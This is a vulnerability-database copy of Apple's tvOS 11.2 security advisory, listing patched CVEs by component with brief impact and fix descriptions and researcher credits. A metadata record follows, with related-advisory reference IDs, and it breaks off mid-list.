About the security content of tvOS 11.2 - Apple Support

2018-10-18T05:56:48

Description

## About Apple security updates For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page. For more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>). Apple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible. ![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png) ## tvOS 11.2 Released December 4, 2017 **App Store** Available for: Apple TV 4K and Apple TV (4th generation) Impact: An attacker in a privileged network position may be able to spoof password prompts in App Store Description: An input validation issue was addressed through improved input validation. CVE-2017-7164: Jerry Decime Entry added January 11, 2018 **Auto Unlock** Available for: Apple TV 4K and Apple TV (4th generation) Impact: An application may be able to gain elevated privileges Description: A race condition was addressed with additional validation. CVE-2017-13905: Samuel Groß (@5aelo) Entry added October 18, 2018 **CFNetwork Session** Available for: Apple TV 4K and Apple TV (4th generation) Impact: An application may be able to execute arbitrary code with system privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2017-7172: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative Entry added January 22, 2018 **CoreAnimation** Available for: Apple TV 4K and Apple TV (4th generation) Impact: An application may be able to execute arbitrary code with elevated privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2017-7171: 360 Security working with Trend Micro's Zero Day Initiative, and Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative Entry added January 22, 2018 **CoreFoundation** Available for: Apple TV 4K and Apple TV (4th generation) Impact: An application may be able to gain elevated privileges Description: A race condition was addressed with additional validation. CVE-2017-7151: Samuel Groß (@5aelo) Entry added October 18, 2018 **IOKit** Available for: Apple TV 4K and Apple TV (4th generation) Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2017-7162: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative Entry added December 21, 2017, updated January 10, 2018 **IOSurface** Available for: Apple TV 4K and Apple TV (4th generation) Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2017-13861: Ian Beer of Google Project Zero **Kernel** Available for: Apple TV 4K and Apple TV (4th generation) Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2017-13904: Kevin Backhouse of Semmle Ltd. Entry added February 14, 2018 **Kernel** Available for: Apple TV 4K and Apple TV (4th generation) Impact: An application may be able to read kernel memory (Meltdown) Description: Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache. CVE-2017-5754: Jann Horn of Google Project Zero; Moritz Lipp of Graz University of Technology; Michael Schwarz of Graz University of Technology; Daniel Gruss of Graz University of Technology; Thomas Prescher of Cyberus Technology GmbH; Werner Haas of Cyberus Technology GmbH; Stefan Mangard of Graz University of Technology; Paul Kocher; Daniel Genkin of University of Pennsylvania and University of Maryland; Yuval Yarom of University of Adelaide and Data61; and Mike Hamburg of Rambus (Cryptography Research Division) Entry added January 4, 2018, updated January 10, 2018 **Kernel** Available for: Apple TV 4K and Apple TV (4th generation) Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2017-13862: Apple CVE-2017-13867: Ian Beer of Google Project Zero CVE-2017-13876: Ian Beer of Google Project Zero Entry updated December 21, 2017 **Kernel** Available for: Apple TV 4K and Apple TV (4th generation) Impact: An application may be able to read restricted memory Description: An out-of-bounds read was addressed with improved bounds checking. CVE-2017-7173: Brandon Azad Entry updated August 1, 2018 **Kernel** Available for: Apple TV 4K and Apple TV (4th generation) Impact: An application may be able to read restricted memory Description: A type confusion issue was addressed with improved memory handling. CVE-2017-13855: Jann Horn of Google Project Zero **Kernel** Available for: Apple TV 4K and Apple TV (4th generation) Impact: An application may be able to read restricted memory Description: Multiple validation issues were addressed with improved input sanitization. CVE-2017-13865: Ian Beer of Google Project Zero CVE-2017-13868: Brandon Azad CVE-2017-13869: Jann Horn of Google Project Zero **Kernel** Available for: Apple TV 4K and Apple TV (4th generation) Impact: A local user may be able to cause unexpected system termination or read kernel memory Description: An input validation issue existed in the kernel. This issue was addressed through improved input validation. CVE-2017-7154: Jann Horn of Google Project Zero Entry added December 21, 2017 **WebKit** Available for: Apple TV 4K and Apple TV (4th generation) Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2017-13885: 360 Security working with Trend Micro's Zero Day Initiative Entry added January 22, 2018 **WebKit** Available for: Apple TV 4K and Apple TV (4th generation) Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2017-7165: 360 Security working with Trend Micro's Zero Day Initiative Entry added January 22, 2018 **WebKit** Available for: Apple TV 4K and Apple TV (4th generation) Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2017-13884: 360 Security working with Trend Micro's Zero Day Initiative Entry added January 22, 2018 **WebKit** Available for: Apple TV 4K and Apple TV (4th generation) Impact: Visiting a malicious website may lead to user interface spoofing Description: Redirect responses to 401 Unauthorized may allow a malicious website to incorrectly display the lock icon on mixed content. This issue was addressed through improved URL display logic. CVE-2017-7153: Jerry Decime Entry added January 11, 2018 **WebKit** Available for: Apple TV 4K and Apple TV (4th generation) Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2017-7156: Yuan Deng of Ant-financial Light-Year Security Lab CVE-2017-7157: an anonymous researcher CVE-2017-13856: Jeonghoon Shin CVE-2017-13870: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative CVE-2017-7160: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative CVE-2017-13866: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative Entry updated January 10, 2018 **Wi-Fi** Available for: Apple TV (4th generation) Released for Apple TV 4K in [tvOS 11.1](<https://support.apple.com/kb/HT208219>). Impact: An attacker in Wi-Fi range may force nonce reuse in WPA multicast/GTK clients (Key Reinstallation Attacks - KRACK) Description: A logic issue existed in the handling of state transitions. This was addressed with improved state management. CVE-2017-13080: Mathy Vanhoef of the imec-DistriNet group at KU Leuven

Affected Software

CPE Name	Name	Version
	tvos	11.2

{"id": "APPLE:HT208327", "bulletinFamily": "software", "title": "About the security content of tvOS 11.2 - Apple Support", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## tvOS 11.2\n\nReleased December 4, 2017\n\n**App Store**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An attacker in a privileged network position may be able to spoof password prompts in App Store\n\nDescription: An input validation issue was addressed through improved input validation.\n\nCVE-2017-7164: Jerry Decime\n\nEntry added January 11, 2018\n\n**Auto Unlock**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-13905: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**CFNetwork Session**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7172: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreAnimation**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7171: 360 Security working with Trend Micro's Zero Day Initiative, and Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreFoundation**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-7151: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**IOKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7162: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added December 21, 2017, updated January 10, 2018\n\n**IOSurface**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13861: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13904: Kevin Backhouse of Semmle Ltd.\n\nEntry added February 14, 2018\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to read kernel memory (Meltdown)\n\nDescription: Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache.\n\nCVE-2017-5754: Jann Horn of Google Project Zero; Moritz Lipp of Graz University of Technology; Michael Schwarz of Graz University of Technology; Daniel Gruss of Graz University of Technology; Thomas Prescher of Cyberus Technology GmbH; Werner Haas of Cyberus Technology GmbH; Stefan Mangard of Graz University of Technology; Paul Kocher; Daniel Genkin of University of Pennsylvania and University of Maryland; Yuval Yarom of University of Adelaide and Data61; and Mike Hamburg of Rambus (Cryptography Research Division)\n\nEntry added January 4, 2018, updated January 10, 2018\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13862: Apple\n\nCVE-2017-13867: Ian Beer of Google Project Zero\n\nCVE-2017-13876: Ian Beer of Google Project Zero\n\nEntry updated December 21, 2017\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2017-7173: Brandon Azad\n\nEntry updated August 1, 2018\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to read restricted memory\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2017-13855: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to read restricted memory\n\nDescription: Multiple validation issues were addressed with improved input sanitization.\n\nCVE-2017-13865: Ian Beer of Google Project Zero\n\nCVE-2017-13868: Brandon Azad\n\nCVE-2017-13869: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An input validation issue existed in the kernel. This issue was addressed through improved input validation.\n\nCVE-2017-7154: Jann Horn of Google Project Zero\n\nEntry added December 21, 2017\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13885: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7165: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13884: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Visiting a malicious website may lead to user interface spoofing\n\nDescription: Redirect responses to 401 Unauthorized may allow a malicious website to incorrectly display the lock icon on mixed content. This issue was addressed through improved URL display logic.\n\nCVE-2017-7153: Jerry Decime\n\nEntry added January 11, 2018\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7156: Yuan Deng of Ant-financial Light-Year Security Lab\n\nCVE-2017-7157: an anonymous researcher\n\nCVE-2017-13856: Jeonghoon Shin\n\nCVE-2017-13870: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-7160: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-13866: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry updated January 10, 2018\n\n**Wi-Fi**\n\nAvailable for: Apple TV (4th generation) \nReleased for Apple TV 4K in [tvOS 11.1](<https://support.apple.com/kb/HT208219>).\n\nImpact: An attacker in Wi-Fi range may force nonce reuse in WPA multicast/GTK clients (Key Reinstallation Attacks - KRACK)\n\nDescription: A logic issue existed in the handling of state transitions. This was addressed with improved state management.\n\nCVE-2017-13080: Mathy Vanhoef of the imec-DistriNet group at KU Leuven\n", "published": "2018-10-18T05:56:48", "modified": "2018-10-18T05:56:48", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://support.apple.com/kb/HT208327", "reporter": "Apple", "references": [], "cvelist": ["CVE-2017-13869", "CVE-2017-5754", "CVE-2017-13856", "CVE-2017-13866", "CVE-2017-7151", "CVE-2017-13080", "CVE-2017-13865", "CVE-2017-7172", "CVE-2017-7165", "CVE-2017-13904", "CVE-2017-7171", "CVE-2017-13855", "CVE-2017-7162", "CVE-2017-13876", "CVE-2017-13870", "CVE-2017-13868", "CVE-2017-7153", "CVE-2017-7156", "CVE-2017-7160", "CVE-2017-13884", "CVE-2017-13867", "CVE-2017-7173", "CVE-2017-13861", "CVE-2017-7154", "CVE-2017-7157", "CVE-2017-13905", "CVE-2017-13885", "CVE-2017-13862", "CVE-2017-7164"], "type": "apple", "lastseen": "2020-12-24T20:43:22", "edition": 3, "viewCount": 17, "enchantments": {"dependencies": {"references": [{"type": "aix", "idList": ["SPECTRE_MELTDOWN_ADVISORY.ASC", "SPECTRE_UPDATE_ADVISORY.ASC"]}, {"type": "amazon", "idList": ["ALAS-2018-939", "ALAS2-2018-939"]}, {"type": "androidsecurity", "idList": ["ANDROID:2017-11-01", "ANDROID:2018-01-01", "ANDROID:2018-04-01", "ANDROID:2018-05-01", "ANDROID:2018-09-01", "ANDROID:2018-12-01"]}, {"type": "apple", "idList": ["APPLE:05865687B681A94EDACF5CD84F56F0EF", "APPLE:0627AF17A33B956DE48ACE757A30BFB9", "APPLE:076A5029E1D9073AD8A212C272CBA098", "APPLE:121C0C2C932F899F870D9D5665610ED0", "APPLE:31324259F2722EDCDF4BD19554187E7A", "APPLE:3CD8680715FC8DF4A758CC6012471868", "APPLE:718D8AEEB116992EF0FD8052E050FE9A", "APPLE:A906ED60E2875C343BE4CB7524339858", "APPLE:B3402276360A8C507F94E26E15D465F4", "APPLE:B7AA5B9368DE4BD135A602B017EB0259", "APPLE:B8F16B37FC64788E8894EE9818D392DA", "APPLE:CE1834F14896537612441EAFB62595C9", "APPLE:D5B2B0A52189C378A357D40438F75CF8", "APPLE:F6306C158D7B30BA0A0EDD411C414BFE", "APPLE:FAC8B05FC20C773432450AA689A274D6", "APPLE:FAE8F6548DA345F4466BB73DD8BE2763", "APPLE:HT208219", "APPLE:HT208220", "APPLE:HT208221", "APPLE:HT208222", "APPLE:HT208258", "APPLE:HT208324", "APPLE:HT208325", "APPLE:HT208326", "APPLE:HT208328", "APPLE:HT208331", "APPLE:HT208334", "APPLE:HT208354", "APPLE:HT208465", "APPLE:HT208692", "APPLE:HT208847"]}, {"type": "archlinux", "idList": ["ASA-201710-22", "ASA-201710-23", "ASA-201801-1", "ASA-201801-3", "ASA-201801-4", "ASA-201801-6"]}, {"type": "centos", "idList": ["CESA-2017:2907", "CESA-2017:2911", "CESA-2018:0007", "CESA-2018:0008", "CESA-2018:0151", "CESA-2018:0512", "CESA-2018:1062", "CESA-2018:1319"]}, {"type": "cert", "idList": ["VU:180049", "VU:228519", "VU:584653"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2018-0011"]}, {"type": "cisco", "idList": ["CISCO-SA-20171016-WPA", "CISCO-SA-20180104-CPUSIDECHANNEL"]}, {"type": "citrix", "idList": ["CTX231390", "CTX231399", "CTX234679"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:08639CF3E8D6C946D02AFEE0F4B5B0A0", "CFOUNDRY:1A91EDE432C17AF89F8A4DC15F5D5A55", "CFOUNDRY:86B5C35F8F0E334D1CCCDAF1214EDFEF", "CFOUNDRY:8730FEC9F4689F70DBBC5917AC5BF0C6"]}, {"type": "cve", "idList": ["CVE-2017-13080", "CVE-2017-13855", "CVE-2017-13856", "CVE-2017-13861", "CVE-2017-13862", "CVE-2017-13865", "CVE-2017-13866", "CVE-2017-13867", "CVE-2017-13868", "CVE-2017-13869", "CVE-2017-13870", "CVE-2017-13876", "CVE-2017-13884", "CVE-2017-13885", "CVE-2017-13904", "CVE-2017-13905", "CVE-2017-5754", "CVE-2017-7151", "CVE-2017-7153", "CVE-2017-7154", "CVE-2017-7156", "CVE-2017-7157", "CVE-2017-7160", "CVE-2017-7162", "CVE-2017-7164", "CVE-2017-7165", "CVE-2017-7171", "CVE-2017-7172", "CVE-2017-7173", "CVE-2018-10471", "CVE-2018-19965"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1150-1:A6833", "DEBIAN:DLA-1200-1:A0B61", "DEBIAN:DLA-1232-1:15F37", "DEBIAN:DLA-1573-1:A1DDB", "DEBIAN:DSA-3999-1:C5D5F", "DEBIAN:DSA-4078-1:83863", "DEBIAN:DSA-4082-1:57979", "DEBIAN:DSA-4082-1:58978", "DEBIAN:DSA-4120-1:7BEB7"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2017-13080", "DEBIANCVE:CVE-2017-13856", "DEBIANCVE:CVE-2017-13866", "DEBIANCVE:CVE-2017-13870", "DEBIANCVE:CVE-2017-13884", "DEBIANCVE:CVE-2017-13885", "DEBIANCVE:CVE-2017-5754", "DEBIANCVE:CVE-2017-7153", "DEBIANCVE:CVE-2017-7156", "DEBIANCVE:CVE-2017-7157", "DEBIANCVE:CVE-2017-7160", "DEBIANCVE:CVE-2017-7165", "DEBIANCVE:CVE-2018-10471", "DEBIANCVE:CVE-2018-19965"]}, {"type": "exploitdb", "idList": ["EDB-ID:44234", "EDB-ID:46248"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:2E83259D04E7C08ED83A449A0677A6B3", "EXPLOITPACK:415A901F9BC5DABDC36EDFC6E3924DAC"]}, {"type": "f5", "idList": ["F5:K11270891", "F5:K23642330", "F5:K54252492", "F5:K91229003"]}, {"type": "fedora", "idList": ["FEDORA:0DD9C604DD0F", "FEDORA:1714A6074A50", "FEDORA:8E50360491B7", "FEDORA:AA0BE60A8642", "FEDORA:B0AFE6075EE6", "FEDORA:F117D6006273", "FEDORA:F21276042F34"]}, {"type": "fortinet", "idList": ["FG-IR-17-196", "FG-IR-18-002"]}, {"type": "freebsd", "idList": ["1CE95BC7-3278-11E8-B527-00012E582166", "74DAA370-2797-11E8-95EC-A4BADB2F4699", "D670A953-B2A1-11E7-A633-009C02A2AB30"]}, {"type": "gentoo", "idList": ["GLSA-201711-03", "GLSA-201801-09", "GLSA-201803-11", "GLSA-201810-06"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:37170621F78D33B9DDE68A73E0A16294", "GOOGLEPROJECTZERO:42FBA08807698DC5CD34486014AC8332", "GOOGLEPROJECTZERO:8F5F85400267DF1EFD1897A0E2FF0671"]}, {"type": "hackerone", "idList": ["H1:286740"]}, {"type": "hp", "idList": ["HP:C05843704", "HP:C05869091", "HP:C05872536", "HP:C05876244", "HP:C05963224", "HP:C06961391"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20171117-01-WPA", "HUAWEI-SA-20180106-01-CPU", "HUAWEI-SA-20180606-01-CPU"]}, {"type": "ibm", "idList": ["174F1CB3220ED56F318FA688B5104CC5CCC2107DBECA87BE989ABF3A0091E073", "1A56C0E27437AA486509D2812836A0A7761E820321946BF730BBC1A9B185F972", "1ABA3EC50C5BB5DE641865CF34A5CAC018FE13D6CFF8FE946D2F218907356D71", "28E683B9E1028822A2C208D0617DA2DE26079DCB38CC45919D696CC7747F906B", "2A40009A88F7F92C59723B05B8A8BC439ECB104B7E48FAB00AAABF8FE910CEF1", "2C6883C7D3865B8039726C3454BA0B0D5A6F3F11B0878992EA2AACAC9F364E05", "3540AA54A1ED51682893BA31F766B870A1375441D71B0C703E82EAA191CC0D6A", "4BDA96731BEDBE3B4D78DBA9FA7051E3DF5C22631E9222A0E15B433BB8B9B171", "567345576590494CB813B386383CCFD2CCE4CD51C93AD9D6FD80D7D632CC8257", "5D63DFA90AE05BD537122A9820FEC290A8E1FB9D0AEF4B12256F5FA09B670775", "65AEAA74B4397CD9FC1768668C6ED4E2A219B5570B2041431D7D2F5201973D4D", "77DA9A466A7C42373FF7E0F4EB5E62474CCAD685AD37FE9457EFB7AD15F923AD", "7A53C19FF480E48C62F3A876817E646DD9329F4F75468297B786BC33EF754038", "8325E2E8632F22E10CD653162D8EFC2BD56BD809EC2298B08EF585D287E1CFA8", "87A19FB5346DA81A86907270AB84E2E3899A8B6E531102A2175D836AB9D8EBF9", "A594E3179D9A187B5EAE777411B4109CB85600F1AEC96905951B67E4F825EC64", "A6E0AA4F7CE2CD35281870E21B59F32FD6E5217A46EC5702A87294F585538FD3", "B33FA893148E9C76925FA67166C54BB7E197EC96DD88578FEB3D80D16489F9CA", "B35331C8976936545073B60350455C602E3A6DA9E2C52BDF202502219C50D240", "C61272AAD42C3342F52FDEEAF76F6DCE5A2C3FF3C3CF7540B218B24B7CA5C12B"]}, {"type": "ics", "idList": ["ICSA-17-318-01", "ICSA-17-318-01A", "ICSA-17-318-01B", "ICSA-17-318-01C", "ICSA-17-318-02", "ICSA-17-318-02A", "ICSA-17-325-01", "ICSA-17-353-02", "ICSMA-18-114-01", "ICSMA-19-029-01"]}, {"type": "intel", "idList": ["INTEL:INTEL-SA-00088", "INTEL:INTEL-SA-00093", "INTEL:INTEL-SA-00101", "INTEL:INTEL-SA-00402"]}, {"type": "kaspersky", "idList": ["KLA11279", "KLA11851", "KLA11852"]}, {"type": "kitploit", "idList": ["KITPLOIT:8752367943592764867", "KITPLOIT:8917740741292426205"]}, {"type": "krebs", "idList": ["KREBS:6CB809D95C62C82983AC457CB4B0CBB1"]}, {"type": "lenovo", "idList": ["LENOVO:PS500143-NOSID", "LENOVO:PS500151-NOSID", "LENOVO:PS500151-READING-PRIVILEGED-MEMORY-WITH-A-SIDE-CHANNEL-NOSID", "LENOVO:PS500167-NOSID", "LENOVO:PS500377-INTEL-PROSET-WIRELESS-WIFI-SOFTWARE-ADVISORY-NOSID"]}, {"type": "mageia", "idList": ["MGASA-2017-0379", "MGASA-2017-0463", "MGASA-2017-0466", "MGASA-2017-0467", "MGASA-2017-0472", "MGASA-2018-0005", "MGASA-2018-0062", "MGASA-2018-0063", "MGASA-2018-0064", "MGASA-2018-0073", "MGASA-2018-0074", "MGASA-2018-0075", "MGASA-2018-0076", "MGASA-2018-0077", "MGASA-2018-0078", "MGASA-2018-0080", "MGASA-2018-0102", "MGASA-2018-0134", "MGASA-2018-0172", "MGASA-2018-0187", "MGASA-2018-0264", "MGASA-2018-0286", "MGASA-2018-0323"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:3DDE32E41BE8356C194673EE3ED7FDBE", "MALWAREBYTES:C47D8F4321BF60FB315B6C46B47DF46F"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-APPLE_IOS-BROWSER-WEBKIT_CREATETHIS-"]}, {"type": "mscve", "idList": ["MS:ADV180002", "MS:ADV180018", "MS:CVE-2017-13080"]}, {"type": "mskb", "idList": ["KB4041676", "KB4041678", "KB4041679", "KB4041681", "KB4041687", "KB4041689", "KB4041690", "KB4041691", "KB4041693", "KB4042723", "KB4073065", "KB4284819", "KB4284826", "KB4284835", "KB4284860", "KB4284867", "KB4284874", "KB4284880", "KB4338815", "KB4338820", "KB4338824", "KB4338830", "KB4340583", "KB4467680", "KB4467686", "KB4467691", "KB4467696", "KB4467702", "KB4467708", "KB4480957", "KB4480960", "KB4480963", "KB4480964", "KB4480968", "KB4480970", "KB4480972", "KB4480975", "KB4493446", "KB4493448", "KB4493464", "KB4493467", "KB4493472"]}, {"type": "myhack58", "idList": ["MYHACK58:62201789609"]}, {"type": "nessus", "idList": ["700322.PRM", "700325.PRM", "700501.PRM", "700512.PRM", "700513.PRM", "700543.PRM", "700544.PRM", "AIX_IJ03029.NASL", "AIX_IJ03030.NASL", "AIX_IJ03032.NASL", "AIX_IJ03033.NASL", "AIX_IJ03034.NASL", "AIX_IJ03035.NASL", "AIX_IJ03036.NASL", "AL2_ALAS-2018-939.NASL", "ALA_ALAS-2018-939.NASL", "APPLETV_11_1.NASL", "APPLETV_11_2.NASL", "APPLE_IOS_111_CHECK.NBIN", "APPLE_IOS_112_CHECK.NBIN", "ARUBAOS_KRACK.NASL", "CENTOS_RHSA-2017-2907.NASL", "CENTOS_RHSA-2017-2911.NASL", "CENTOS_RHSA-2018-0007.NASL", "CENTOS_RHSA-2018-0008.NASL", "CENTOS_RHSA-2018-0151.NASL", "CENTOS_RHSA-2018-0512.NASL", "CENTOS_RHSA-2018-1062.NASL", "CENTOS_RHSA-2018-1319.NASL", "CISCO-SA-20171016-WPA-ASA_WITH_FIREPOWER_SERVICES.NASL", "CITRIX_XENSERVER_CTX231390.NASL", "CITRIX_XENSERVER_CTX234679.NASL", "DEBIAN_DLA-1150.NASL", "DEBIAN_DLA-1200.NASL", "DEBIAN_DLA-1232.NASL", "DEBIAN_DLA-1573.NASL", "DEBIAN_DSA-3999.NASL", "DEBIAN_DSA-4078.NASL", "DEBIAN_DSA-4082.NASL", "DEBIAN_DSA-4120.NASL", "EULEROS_SA-2017-1241.NASL", "EULEROS_SA-2017-1242.NASL", "EULEROS_SA-2018-1001.NASL", "EULEROS_SA-2018-1002.NASL", "EULEROS_SA-2018-1236.NASL", "EULEROS_SA-2019-1414.NASL", "EULEROS_SA-2019-1422.NASL", "EULEROS_SA-2019-1514.NASL", "EULEROS_SA-2019-1539.NASL", "EULEROS_SA-2019-1637.NASL", "EULEROS_SA-2019-1638.NASL", "EULEROS_SA-2019-2274.NASL", "EULEROS_SA-2020-1674.NASL", "EULEROS_SA-2022-1735.NASL", "F5_BIGIP_SOL91229003.NASL", "FEDORA_2017-06B373D942.NASL", "FEDORA_2017-0AD0E2F390.NASL", "FEDORA_2017-12E76E8364.NASL", "FEDORA_2017-60BFB576B7.NASL", "FEDORA_2017-F45E844A85.NASL", "FEDORA_2018-3199135A7E.NASL", "FEDORA_2018-43712163DE.NASL", "FORTIOS_FG-IR-17-196.NASL", "FREEBSD_PKG_1CE95BC7327811E8B52700012E582166.NASL", "FREEBSD_PKG_74DAA370279711E895ECA4BADB2F4699.NASL", "FREEBSD_PKG_D670A953B2A111E7A633009C02A2AB30.NASL", "GENTOO_GLSA-201711-03.NASL", "GENTOO_GLSA-201801-09.NASL", "GENTOO_GLSA-201803-11.NASL", "GENTOO_GLSA-201810-06.NASL", "INTEL_SA_00101_WLAN.NASL", "ITUNES_12_7_2.NASL", "ITUNES_12_7_2_BANNER.NASL", "JUNIPER_JSA10827_KRACK.NASL", "LINUX_KERNEL_SPECULATIVE_EXECUTION_DETECT.NBIN", "MACOSX_SAFARI11_0_2.NASL", "MACOSX_SECUPD2017-004.NASL", "MACOSX_SECUPD2017-005.NASL", "MACOSX_SECUPD2018-001.NASL", "MACOSX_SECUPD2018-002.NASL", "MACOS_10_13_1.NASL", "MACOS_10_13_2.NASL", "MACOS_10_13_4.NASL", "MICROSOFT_WINDOWS_SPEC_EXECUTION.NBIN", "MIKROTIK_KRACK.NASL", "NEWSTART_CGSL_NS-SA-2019-0007_KERNEL.NASL", "NEWSTART_CGSL_NS-SA-2019-0049_KERNEL-RT.NASL", "NEWSTART_CGSL_NS-SA-2019-0120_WPA_SUPPLICANT.NASL", "NEWSTART_CGSL_NS-SA-2019-0143_KERNEL.NASL", "NVIDIA_UNIX_CVE_2017_5753.NASL", "NVIDIA_WIN_CVE_2017_5753.NASL", 